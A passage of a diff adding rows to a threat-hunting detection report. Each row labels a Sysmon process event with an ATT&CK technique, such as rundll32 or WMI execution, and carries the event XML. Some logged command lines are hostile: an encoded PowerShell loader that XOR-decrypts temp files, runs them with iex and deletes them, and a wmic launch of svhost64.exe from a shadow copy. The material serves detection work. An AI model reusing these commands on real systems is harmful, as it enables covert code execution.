+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
+    <Data Name=""LogonId"">0x29126</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
+    <Data Name=""ParentProcessId"">4824</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
+    </TimeCreated>
+    <EventRecordID>417079</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3500"" ThreadID=""4688"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
+    <Data Name=""ProcessId"">840</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
+    <Data Name=""LogonId"">0xa09d1</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
+    </TimeCreated>
+    <EventRecordID>10674</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2004"" ThreadID=""4480"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
+    <Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
+    <Data Name=""LogonId"">0x29126</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
+    <Data Name=""ParentProcessId"">4824</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Filename: redirection.config&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.233522Z"">
+    </TimeCreated>
+    <EventRecordID>5952</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.183</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001026B9FF00</Data>
+    <Data Name=""ProcessId"">1036</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Filename: redirection.config&quot; /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:54.447494Z"">
+    </TimeCreated>
+    <EventRecordID>6188</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:54.428</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
+    <Data Name=""ProcessId"">2356</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
+    </TimeCreated>
+    <EventRecordID>417079</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3500"" ThreadID=""4688"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
+    <Data Name=""ProcessId"">840</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
+    <Data Name=""LogonId"">0xa09d1</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
+    </TimeCreated>
+    <EventRecordID>10674</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2004"" ThreadID=""4480"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
+    <Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
+    <Data Name=""LogonId"">0x29126</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
+    <Data Name=""ParentProcessId"">4824</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:01:43.391862Z"">
+    </TimeCreated>
+    <EventRecordID>16496</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:01:31.380</Data>
+    <Data Name=""ProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
+    <Data Name=""ProcessId"">3788</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-502E-5CD8-0000-00102A330700</Data>
+    <Data Name=""ParentProcessId"">3192</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:54.447494Z"">
+    </TimeCreated>
+    <EventRecordID>6188</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:54.428</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
+    <Data Name=""ProcessId"">2356</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
